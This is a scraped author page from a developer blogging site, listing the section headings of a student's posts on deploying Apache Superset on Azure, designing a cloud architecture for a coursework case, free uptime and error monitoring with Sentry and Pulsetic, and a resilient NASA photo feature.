❌ Accountability vanishes into "the algorithm did it"
❌ Only well-funded enterprises can afford AI infrastructure

The IRL system proves that innovation and responsibility aren't competing goals. They're mutually reinforcing.

Built with ☕ and TypeScript by Luis Faria

Student @ Torrens University Australia | HCD402 | Dec 2025

Forem: Luis Faria

Deploying Apache Superset on Azure From Scratch: My CCF501 Assessment 3

The Jump From Diagrams to Reality

Course Context: CCF501 in 12 Weeks

Why Apache Superset (The Off-List Bet)

The Architecture

Why IaaS, Not PaaS?

From-Scratch Deployment

1. Provision Azure infrastructure

2. SSH in and install Docker

3. Drop in the Docker Compose stack

4. Bring it up and validate

5. Use the application

Security and Governance: Defence in Layers

Network layer (NSG):

OS layer:

Application layer (Superset RBAC):

Credential layer:

The honest gap — and only acceptable for this context:

AWS Portability Note

What This Term Taught Me

Building in Public

Let's Connect

References

Designing a Cloud Architecture from Scratch: My CCF501 Assessment 1

The Challenge

Why Cloud? (And Why Not On-Premises)

Three Benefits That Mattered for ABC

1. Cost Efficiency: CAPEX to OPEX

2. Rapid Scalability Without Procurement

3. Reduced IT Management Overhead

The Architecture

The Three Challenges (and How to Mitigate Them)

1. Security and Privacy

2. Cost Volatility

3. Vendor Lock-in and Skills Gap

Deployment and Service Model

Why Public Cloud

Why IaaS + PaaS (Not SaaS)

Cost Model

Why AWS Over Azure or GCP

What the Exercise Actually Taught Me

Full Services Provisioned

Building in Public

Let's Connect

References

Production Observability for $0: How I Monitor My Portfolio with Sentry + Pulsetic

The Email That Made It Real

The Problem: Shipping Blind

The Architecture: 4 Layers

Layer 1: Tiered Health Endpoints

Layer 2: Sentry — Error Tracking for Both Services

The Backend Setup (@sentry/node)

The Frontend Gotcha: instrumentation.ts

Layer 3: Pulsetic — External Uptime Monitoring

Layer 4: Cron Resource Monitor

Real Data: First Sentry Weekly Report

What I Learned: SRE Concepts Applied

The Alert Flow

Key Takeaways

1. The instrumentation.ts File Is Not Optional

2. Filter Before You Drown in Auth Noise

3. 503 Is Not "Down" — Design for Degradation

4. Alert Deduplication Is Not Optional

5. Real Data Changes How You Think

Tech Stack

Try It Yourself

Let's Connect

My portfolio fetches NASA's Daily Space Photo - and never fails!

The Vision: Bringing Space to My Portfolio

The User Experience

The Challenge: External APIs Are Unreliable

The Architecture: Layered Resilience

Key Architectural Decisions (3 of them!)

The Journey: 8 Issues, 40+ Commits, 1 Production Feature

Phase 1: Foundation (Issues #61-65)

Phase 2: NASA API Client (Issue #66)

Phase 3: The Hard Part — Failures & Fallbacks (aka scars earned)

Phase 4: HTML Scraping Fallback (Issue #78)

Phase 5: Shared Error Handling Infrastructure (Issue #79)

The Backend Setup (`@sentry/node`)

The Frontend Gotcha: `instrumentation.ts`

1. The `instrumentation.ts` File Is Not Optional